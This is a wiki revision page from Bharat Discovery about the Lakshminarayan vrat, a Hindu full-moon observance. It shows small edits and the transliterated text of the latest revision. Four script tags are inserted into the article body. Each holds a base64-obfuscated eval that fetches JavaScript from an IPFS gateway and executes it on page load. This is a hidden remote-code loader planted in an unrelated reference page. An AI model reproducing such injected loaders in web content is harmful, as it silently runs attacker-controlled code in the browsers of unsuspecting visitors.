Difference between revisions of "लक्ष्मीनारायण व्रत"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "उल्लखित" to "उल्लिखित")
m (Text replace - ")</ref" to "</ref")
 
(2 intermediate revisions by 2 users not shown)
Line 2: Line 2:
 
*[[फाल्गुन]] [[पूर्णिमा]] पर लक्ष्मीनारायण व्रत किया जाता है।
 
*[[फाल्गुन]] [[पूर्णिमा]] पर लक्ष्मीनारायण व्रत किया जाता है।
 
*लक्ष्मीनारायणव्रत तिथि; वर्ष भर प्रत्येक पूर्णिमा पर, वर्ष को चार मासों के तीन भागों में बाँटकर किया जाता है।
 
*लक्ष्मीनारायणव्रत तिथि; वर्ष भर प्रत्येक पूर्णिमा पर, वर्ष को चार मासों के तीन भागों में बाँटकर किया जाता है।
*[[आषाढ़]] से आगे चार मासों में [[श्रीधर]] एवं श्री के नामों का प्रयोग, [[कार्तिका]] को लेकर चार मासों में [[केशव (कृष्ण)|केशव]] एवं भूति के नामों का प्रयोग करना चाहिए।
+
*[[आषाढ़]] से आगे चार मासों में [[श्रीधर]] एवं श्री के नामों का प्रयोग, [[कृत्तिका नक्षत्र|कार्तिका]] को लेकर चार मासों में [[केशव (कृष्ण)|केशव]] एवं भूति के नामों का प्रयोग करना चाहिए।
 
*रात्रि में प्रत्येक 15 पर चन्द्र को अर्ध्य देना चाहिए।
 
*रात्रि में प्रत्येक 15 पर चन्द्र को अर्ध्य देना चाहिए।
*देह शद्धि के लिए प्रत्येक अवधि में विभिन्न पदार्थों का प्रयोग, यथा–पंचगव्य, कुश जल, सूर्य किरण से तप्त जल करना चाहिए।<ref>हेमाद्रि (व्रत खण्ड 2, 664-666, विष्णुधर्मोत्तरपुराण से उद्धरण)</ref>  
+
*देह शद्धि के लिए प्रत्येक अवधि में विभिन्न पदार्थों का प्रयोग, यथा–पंचगव्य, कुश जल, सूर्य किरण से तप्त जल करना चाहिए।<ref>हेमाद्रि (व्रत खण्ड 2, 664-666, विष्णुधर्मोत्तरपुराण से उद्धरण</ref>  
 +
{{संदर्भ ग्रंथ}}
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>

Latest revision as of 12:59, 27 July 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • phalgun poornima par lakshminarayan vrat kiya jata hai.
  • lakshminarayanavrat tithi; varsh bhar pratyek poornima par, varsh ko char masoan ke tin bhagoan mean baantakar kiya jata hai.
  • ashadh se age char masoan mean shridhar evan shri ke namoan ka prayog, kartika ko lekar char masoan mean keshav evan bhooti ke namoan ka prayog karana chahie.
  • ratri mean pratyek 15 par chandr ko ardhy dena chahie.
  • deh shaddhi ke lie pratyek avadhi mean vibhinn padarthoan ka prayog, yatha–panchagavy, kush jal, soory kiran se tapt jal karana chahie.[1]

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. hemadri (vrat khand 2, 664-666, vishnudharmottarapuran se uddharan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>